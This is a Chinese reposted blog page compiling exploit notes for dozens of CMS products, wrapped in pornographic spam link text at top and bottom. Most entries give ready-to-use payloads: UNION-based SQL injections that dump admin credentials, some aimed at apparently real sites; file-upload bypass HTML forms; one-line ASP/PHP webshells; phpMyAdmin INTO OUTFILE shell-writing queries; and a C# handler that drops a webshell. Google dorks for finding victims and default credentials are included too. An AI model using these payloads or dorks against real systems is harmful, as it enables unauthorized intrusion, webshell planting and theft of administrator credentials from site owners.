日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

几个cms漏洞

發布時間:2025/3/15 编程问答 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 几个cms漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

?

啟航企業建站系統 cookie注入漏洞通殺所有版本

?

直接上exploit:

javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));

test:http://www.tb11.net/system/xitong/shownews.asp?id=210

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Asprain論壇 注冊用戶 上傳圖片就可拿到webshell

?

Asprain是一個適合于各中小學、中專、技校、職高建設校園論壇、師生交流論壇,一些教科研部門、公司企業建設內部論壇、IT技術愛好者建設技術交流論壇的免費論壇程序。

1.txt存放你的一句話馬 如:<%execute(request("cmd"))%>

2.gif 為一小圖片文件,一定要小,比如qq表情圖片

3:copy /b 2.gif+1.txt 3.gif 這樣就偽造了文件頭,但是現在傳上去還不行,我接下來就用

4:copy /b 3.gif+2.gif 4.asp ok,現在文件頭和文件尾都是正常的圖片文件了

5.q.asp;.gif

google:Powered by Asprain

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

ShopNum1全部系統存在上傳漏洞。

?

首先 在 http://www.shopnum1.com/product.html 頁面查看任意產品詳細說明。

按說明 提示登錄后臺。。

在后臺功能頁面->附件管理->附件列表

可以直接上傳.aspx 后綴木馬

http://demo.shopnum1.com/upload/20110720083822500.aspx

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

牛牛CMS中小企業網站管理系統 上傳漏洞

?

牛牛CMS是中企商鋪網專為中小企業網站開發的網站管理系統。

后臺:admin/login.asp

ewebeditor 5.5 Nday

exp:

<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?

<input?type=file?name=uploadfile?size=100><br><br>?

<input?type=submit?value=upload>?

</form>

ps:先上傳小馬.

inurl:member/Register.asp 您好,歡迎來到立即注冊立即登錄設為首頁加入收藏

?

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

YothCMS 遍歷目錄漏洞

?

優斯科技企業網站管理系統(YothCMS)是一款完全開源免費的CMS。

默認后臺:admin/login.asp

遍歷目錄:

ewebeditor/manage/upload.asp?id=1&dir=../

data:

http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

Net112企業建站系統 1.0

?

源碼簡介:

Net112企業建站系統,共有:新聞模塊,產品模塊,案例模塊,下載模塊,相冊模塊,招聘模塊,自定義模塊,友情鏈接模塊 八大模塊。

添加管理員:

http://www.0855.tv/admin/admin.asp?action=add&level=2

其實加不加都不是很重要,后臺文件都沒怎么作驗證。

上傳路徑:

http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200

http://www.0855.tv/inc/Upfile.asp?Stype=2

怎么利用自己研究。

遍歷目錄:

http://www.0855.tv/admin/upfile.asp?path=../..

如:

http://www.0855.tv/admin/upfile.asp?path=../admin

http://www.0855.tv/admin/upfile.asp?path=../data

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

易和陽光購物商城通殺 上傳漏洞

?

前提要求是IIS6.0+asp壞境。

漏洞文件Iheeo_upfile.asp?

過濾不嚴.直接可以iis6.0上傳

把ASP木馬改成0855.asp;1.gif

直接放到明小子上傳

Google搜索:inurl:product.asp?Iheeoid=

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

phpmyadmin后臺4種拿shell方法

?

方法一:

CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );

INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');

SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';

----以上同時執行,在數據庫: mysql 下創建一個表名為:xiaoma,字段為xiaoma1,導出到E:/wamp/www/7.php

一句話連接密碼:xiaoma

方法二:

Create TABLE xiaoma (xiaoma1 text NOT NULL);

Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');

select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';

Drop TABLE IF EXISTS xiaoma;

方法三:

讀取文件內容: select load_file('E:/xamp/www/s.php');

寫一句話:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'

cmd執行權限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

方法四:

select load_file('E:/xamp/www/xiaoma.php');

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

然后訪問網站目錄:http://www.xxxx.com/xiaoma.php?cmd=dir

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

傳信網絡獨立開發網站源碼0day漏洞

?

后臺system/login.asp

進了后臺有個ewebeditor

Google 搜索inurl:product1.asp?tyc=

編輯器漏洞默認后臺ubbcode/admin_login.asp

數據庫ubbcode/db/ewebeditor.mdb

默認賬號密碼yzm 111111

?

拿webshell方法

登陸后臺點擊“樣式管理”-選擇新增樣式?

樣式名稱:scriptkiddies 隨便寫?

路徑模式:選擇絕對路徑?

圖片類型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx

圖片類型比如就是我們要上傳的ASP木馬格式

上傳路徑:/

圖片限制:寫上1000 免的上不了我們的asp木馬

上傳內容不要寫

可以提交了?

樣式增加成功!?

返回樣式管理 找到剛才添加的樣式名稱 然后按工具欄 在按新增工具欄?

按鈕設置 在可選按鈕 選擇插入圖片然后按》 -然后保存設置

網頁地址欄直接輸入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies

上ASP木馬 回車 等到路徑

?

后臺:system/login.asp

Exp:

and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master

測試:

http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master

http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

foosun 0day 最新注入漏洞

?

漏洞文件:www.xxx.com/user/SetNextOptions.asp

利用簡單的方法:

暴管理員帳號:

http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

暴管理員密碼:

http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

網站程序的版權未知!

?

默認網站數據庫:

www.i0day.com/data/nxnews.mdb

ewebeditor 在線編輯器:

編輯器數據庫下載地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb

登錄地址:ewebeditor/admin_login.asp

默認密碼:admin admin

登陸后可遍歷目錄:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data

?

Sql注入漏洞:

http://www.i0day.com/detail.asp?id=12

exp:

union select 1,admin,password,4,5,6,7,8 from admin

爆出明文帳號/密碼

?

上傳漏洞:

后臺+upfile.asp

如:

http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。

shell的地址:網址+后臺+成功上傳的馬

google:inurl:news.asp?lanmuName=

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

dedecms最新0day利用不進后臺直接拿WEBSHELL

?

拿webshell的方法如下:

網傳的都是說要知道后臺才能利用,但不用,只要 plus 目錄存在,服務器能外連,就能拿shell.

前題條件,必須準備好自己的dede數據庫,然后插入數據:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');?

?

再用下面表單提交,shell 就在同目錄下 1.php。原理自己研究。。。

<form action="" method="post" name="QuickSearch" id="QuickSearch" οnsubmit="addaction();">

<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />

<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />

<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />

<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />

<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />

<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />

<input type="text" value="true" name="nocache" style="width:400">

<input type="submit" value="提交" name="QuickSearchBtn"><br />

</form>

<script>

function addaction()

{

document.QuickSearch.action=document.QuickSearch.doaction.value;

}

</script>

-----------------------------------------------------------------------------------------------------------------------------------------------

?

dedecms織夢暴最新嚴重0day漏洞

bug被利用步驟如下:

http://www.2cto.com /網站后臺/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面{}上的字母改為當前的驗證碼,即可直接進入網站后臺。

-------------------------------------------------------------------------------------------------------------------------------------------

?

多多淘寶客程序上傳漏洞?

漏洞頁面:

admin\upload_pic.php

傳送門:

http://www.www.com/admin/upload_pic.php?uploadtext=slide1

PS:copy張圖片馬 直接 xxx.php 上傳抓包地址!

------------------------------------------------------------------------------------------------------------------------------------------------------

?

無憂公司系統ASP專業版后臺上傳漏洞

漏洞文件 后臺上傳

admin/uploadPic.asp

漏洞利用 這個漏洞好像是雷池的

http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1

等到的webshell路徑:

/UploadFiles/scriptkiddies.asp;_2.gif

---------------------------------------------------------------------------------------------------------------------------------------------------

?

住哪酒店分銷聯盟系統2010

Search:

inurl:index.php?m=hotelinfo

http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin

默認后臺:index.php?m=admin/login

--------------------------------------------------------------------------------------------------------------------------------------------------

?

inurl:info_Print.asp?ArticleID=

后臺 ad_login.asp

爆管理員密碼:

union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin

------------------------------------------------------------------------------------------------------------------------------------------------------------

?

搜索框漏洞!

%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='

--------------------------------------------------------------------------------------------------------------------------------------------------------

?

關鍵字:

inurl:/reg_TemletSel.asp?step=2

或者

電子商務自助建站--您理想的助手

-------------------------------------------------------------------------------------------------------------------------------------------------

?

iGiveTest 2.1.0注入漏洞

Version: <= 2.1.0

# Homepage: http://iGiveTest.com/

谷歌關鍵字: “Powered by iGiveTest”

隨便注冊一個帳號。然后暴管理員帳號和密碼

http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1

------------------------------------------------------------------------------------------------------------------------------------------------

?

CKXP網上書店注入漏洞

工具加表:shop_admin 加字段:admin

后臺:admin/login.asp?

登陸后訪問:admin/editfile.asp?act= 直接寫馬.也可以直接傳馬:admin/upfile1.asp?path=/

inurl:book.asp 請使用域名訪問本站并不代表我們贊同或者支持讀者的觀點。我們的立場僅限于傳播更多讀者感興趣的信息

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

段富超個人網站系統留言本寫馬漏洞

源碼下載:http://www.mycodes.net/24/2149.htm

addgbook.asp 提交一句話。

連接: http://www.xxxx.tv/date/date3f.asp

google:為防批量,特略!

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

智有道專業旅游系統v1.0 注入及列目錄漏洞

默認后臺路徑:/admin/login.asp

默認管理員:admin

默認密碼:123456

SQL EXP Tset:

http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

ewebeditor(PHP) Ver 3.8 本任意文件上傳0day

EXP:

<title>eWebeditoR3.8 for php任意文件上EXP</title>

<form action="" method=post enctype="multip

art/form-data">?

<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">?

URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>?

<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋體||||||0|||jpg|jpeg|||300|||FFFFFF|||1">?

file:<input type=file name="uploadfile"><br>?

<input type=button value=submit οnclick=fsubmit()>?

</form><br>?

<script>?

function fsubmit(){?

form = document.forms[0];?

form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';?

alert(form.action);?

form.submit();?

}?

</script>

注意修改里面ewebeditor的名稱還有路徑。

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

提交’時提示ip被記錄 防注入系統的利用

網址:http://www.xxx.com/newslist.asp?id=122′

提示“你的操作已被記錄!”等信息。

利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))寫入一句話。

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

西部商務網站管理系統 批量拿shell-0day

這站用的是SQL通用防注入程序 V3.0,恩,這東西可不好繞,我記得當初我有寫過一個文章 通過提交一句話直接拿shell的..唯一的前提是存儲記錄ip的數據庫必須是.asp或.asa才行..看了下sqlin.mdb?

1:admin_upset.asp 這個文件有個設置上傳后綴的地方.. 很簡單,它直接禁止了asp,asa.aspx 還有個cer可以利用嘛

2:同樣是admin_upset.asp 這個文件不是入庫的 他是直接在htmleditor目錄生成個config.asp文件...Ok不用多說,插個一句話搞定...注意閉合

3:admin_bakup.asp 備份數據庫的..但是得本地構造...調用了filesystemobject 怎么利用就不強調了..IIS的bug大家都懂

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

JspRun!6.0 論壇管理后臺注入漏洞

?

SEBUG-ID:20787 發布時間:2011-04-30 影響版本:

JspRun!6.0?

漏洞描述:

JspRun!論壇管理后臺的export變量沒有過濾,直接進入查詢語句,導致進行后臺,可以操作數據庫,獲取系統權限。

在處理后臺提交的文件中ForumManageAction.java第1940行

String export = request.getParameter("export");//直接獲取,沒有安全過濾

if(export!=null){

List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//進入查詢語,執行了...

if(styles==null||styles.size()==0){

<*參考

nuanfan@gmail.com

*> SEBUG安全建議:

www.jsprun.net

(1)安全過濾變量export

(2)在查詢語句中使用占位符

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

烏邦圖企業網站系統 cookies 注入

?

程序完整登陸后臺:/admin/login.asp

默認登陸帳號:admin 密碼:admin888

語句:(前面加個空格)

and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin

或者是16個字段:

and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin

爆不出來自己猜字段。

注入點:http://www.untnt.com/shownews.asp?=88

getshell:后臺有備份,上傳圖片小馬。備份名:a.asp 訪問 xxx.com/databakup/a.asp

關鍵字:

inurl:shownews?asp.id=

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

CKXP網上書店注入漏洞

?

工具加表:shop_admin 加字段:admin

后臺:admin/login.asp?

登陸后訪問:admin/editfile.asp?act= 直接寫馬.也可以直接傳馬:admin/upfile1.asp?path=/

inurl:book.asp 請使用域名訪問本站并不代表我們贊同或者支持讀者的觀點。我們的立場僅限于傳播更多讀者感興趣的信息

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

YxShop易想購物商城4.7.1版本任意文件上傳漏洞

?

http://xxoo.com/controls/fckedit ... aspx/connector.aspx

跳轉到網站根目錄上傳任意文件。

如果connector.aspx文件被刪可用以下exp,copy以下代碼另存為html,上傳任意文件

<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">

Upload a new file:<br>

<input type="file" name="NewFile" size="50"><br>

<input id="btnUpload" type="submit" value="Upload">

</form>

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

SDcms 后臺拿webshell

?

第一種方法:

進入后臺-->系統管理-->系統設置-->系統設置->網站名稱;

把網站名稱內容修改為 "%><%eval request("xxx")' //密碼為xxx

用菜刀鏈接http://www.xxx.com/inc/const.asp 就搞定了。

第二種方法:

進入后臺-->系統管理-->系統設置-->系統設置->上傳設置;

在文件類型里面添加一個aaspsp的文件類型,然后找一個上傳的地方直接上傳asp文件! 注:修改文件類型后不能重復點保存!

第三種方法:

進入后臺-->界面管理-->模板文件管理-->創建文件

文件名寫入getshell.ashx

內容寫入下面內容:

/====================復制下面的=========================/

<%@ WebHandler Language="C#" Class="Handler" %>

using System;

using System.Web;

using System.IO;

public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {

context.Response.ContentType = "text/plain";

StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));

file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");

file1.Flush();

file1.Close();

}

public bool IsReusable {

get {

return false;

}

}

}

/=============================================/

訪問這個地址:http://www.xxx.com/skins/2009/getshell.ashx

會在http://www.xxx.com/skins/2009/目錄下生成getshell.asp 一句話木馬 密碼為xxx 用菜刀鏈接

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

ESCMS網站管理系統0day

?

后臺登陸驗證是通過admin/check.asp實現的

?

首先我們打開http://target.com/admin/es_index.html

然后在COOKIE結尾加上

; ESCMS$_SP2=ES_admin=st0p;

修改,然后刷新

進后臺了嘎..

然后呢…提權,嘿嘿,admin/up2.asp,上傳目錄參數filepath過濾不嚴,導致可截斷目錄,生成SHELL

?

利用方法,可以抓包,然后改一下,NC上傳,還可以直接用DOMAIN等工具提交.

嘿嘿,成功了,shell地址為http://target.com/admin/diy.asp

存在這個上傳問題的還有admin/downup.asp,不過好像作者的疏忽,沒有引用inc/ESCMS_Config.asp,導致打開此頁面失敗..

在版本ESCMS V1.0 正式版中,同樣存在上傳問題admin/up2.asp和admin/downup.asp都可利用,只不過cookies欺騙不能用了

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

寧志網站管理系統后臺無驗證漏洞及修復

?

網上搜了一下,好像沒有發布.如有雷同純粹巧合!

官方網站:www.ningzhi.net

學校網站管理系統 V.2011版本?

http://down.chinaz.com/soft/29943.htm?

其它版本(如:政府版等),自行下載.

漏洞說明:后臺所有文件竟然都沒有作訪問驗證...相當無語...竟然用的人還很多.汗~~~

login.asp代碼如下:

<% response.Write"<script language=javascript>alert('登陸成功!請謹慎操作!謝謝!');this.location.href='manage.asp';</script>" %>?

manage.asp代碼我就不帖出來了.反正也沒驗證.

只要訪問登陸頁就可以成功登陸.....蛋疼~~~ 對此本人表示不理解!

漏洞利用:

直接訪問http://www.0855.tv/admin/manage.asp

數據庫操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

phpmyadmin拿shell的四種方法總結及修復

?

方法一:

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );

INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');

SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';

----以上同時執行,在數據庫: mysql 下創建一個表名為:study,字段為7on,導出到E:/wamp/www/7.php

? ? 一句話連接密碼:7on

方法二:

讀取文件內容: select load_file('E:/xamp/www/s.php');

寫一句話: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'

cmd執行權限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

方法三:

JhackJ版本 PHPmyadmin拿shell

Create TABLE study (cmd text NOT NULL);

Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');

select cmd from study into outfile 'E:/wamp/www/7.php';

Drop TABLE IF EXISTS study;

<?php eval($_POST[cmd])?>

CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查詢結果為空(即零行)。

INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影響列數: 1

SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影響列數: 1

DROP TABLE IF EXISTS study;# MySQL 返回的查詢結果為空(即零行)。

方法四:

select load_file('E:/xamp/www/study.php');

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

然后訪問網站目錄:http://www.2cto.com/study.php?cmd=dir

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

?

NO.001中學網站管理系統 Build 110628 注入漏洞

?

NO.001中學網站管理系統功能模塊:

1.管理員資料:網站的基本信息設置(校長郵箱等),數據庫備份,用戶管理、部門及權限管理等

2.學校簡介:一級分類,可以添加校園簡介,領導致辭、校園風光、聯系我們。。。等信息

3.文章管理:二級分類,動態添加各相關頻道(圖片視頻頻道、學校概況頻道除外)文章等信息

4.視頻圖片管理:一級分類,動態添加視頻或者圖片等信息

5.留言管理:對留言,修改,刪除、回復等管理

6.校友頻道:包括校友資料excel導出、管理等功能

7.友情鏈接管理:二級分類,能建立不同種類的友情鏈接顯示在首頁

默認后臺:admin/login.asp

官方演示:http://demo.001cms.net

源碼下載地址:http://down.chinaz.com/soft/30187.htm

EXP:

union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin

測試:http://demo.001cms.net/shownews.asp?type=新聞動態&stype=校務公開&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin

getshell:后臺有備份,你懂的

另:FCK編輯器有幾處可利用.大家自己行挖掘,由于相關內容較多,我在這里就不說了。

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

轉載于:https://www.cnblogs.com/xiyanz/p/6336578.html

總結

以上是生活随笔為你收集整理的几个cms漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 精品无码在线观看 | 国产伦理自拍 | 诱惑の诱惑筱田优在线播放 | free黑人多人性派对hd | 中文字幕在线播放 | 成人午夜久久 | 日本中文一区 | 综合久久五月 | 国产精品国产三级国产aⅴ下载 | 91丨porny丨露出 | 爱草在线视频 | 少妇在线视频 | 亚洲欧洲精品一区二区 | 国产综合视频一区二区 | 亚洲大胆视频 | av观看免费在线 | 在线免费日本 | 操少妇视频 | 黑鬼巨鞭白妞冒白浆 | 亚洲一区自拍偷拍 | 麻豆av一区二区三区 | 色漫 | 毛茸茸亚洲孕妇孕交片 | 国产寡妇亲子伦一区二区三区四区 | 波多野结衣中文字幕在线 | 久久动态图| 自拍偷拍第八页 | 性史性dvd影片农村毛片 | 欧美黄色网络 | 小泽玛利亚一区二区三区视频 | 国产精品国产馆在线真实露脸 | 99re视频| 啪啪在线观看 | 欧美性生话 | 国产日韩在线播放 | 国产福利视频一区二区 | 国产精品视频久久久 | 99久久精品国产成人一区二区 | 麻豆蜜桃在线观看 | 这里只有精品久久 | 亚洲精品久久久久国产 | 国产精品高潮呻吟久久久久久 | 亚洲二区中文字幕 | 亚洲国产精品无码久久久久高潮 | 在线观看中文字幕视频 | 97精品一区二区视频在线观看 | 91青青草 | 日本福利在线 | 亚洲精品美女网站 | 无码h黄肉3d动漫在线观看 | 嫩草视频在线观看免费 | 欧美精品一区二区三区蜜臀 | 黄色成人在线视频 | 四虎国产成人永久精品免费 | 色网导航站| 性插视频在线观看 | 午夜一区二区三区 | 玩弄人妻少妇500系列视频 | 四虎黄色影院 | 黄色网页在线观看 | 亚洲天堂日韩在线 | 天天看夜夜爽 | 超碰人人干人人 | 性――交――性――乱睡觉 | 国产偷v国产偷v亚洲高清 | 丁香在线 | 日韩av一区二区在线 | 欧美日韩一区二区在线 | 精品在线观看一区 | 少妇又紧又色又爽又刺激视频 | 一级黄色片国产 | 欧美一区二区三区四区在线观看 | 日韩免费av在线 | 中文字幕第2页 | 99ri国产| 亚洲综合成人网 | 成人h动漫精品一区二区器材 | 91国产一区 | 女生被草 | 欧美三级在线 | 秋霞午夜视频 | 小黄网站在线观看 | 又黄又刺激的视频 | 懂色av一区二区三区免费 | 99久久精品无码一区二区毛片 | 亚洲一区二区三区在线播放 | 亚洲爆乳无码一区二区三区 | 天天干夜夜 | 综合天天色 | 福利视频在线免费观看 | n0659极腔濑亚美莉在线播放播放 | www.狠狠 | 在线观看黄色免费网站 | 亚洲一区二区三区精品视频 | 狠狠地日 | 精品久久久久久无码国产 | 久久精品一区 | 中文字幕在线播出 | 亚洲精品电影院 |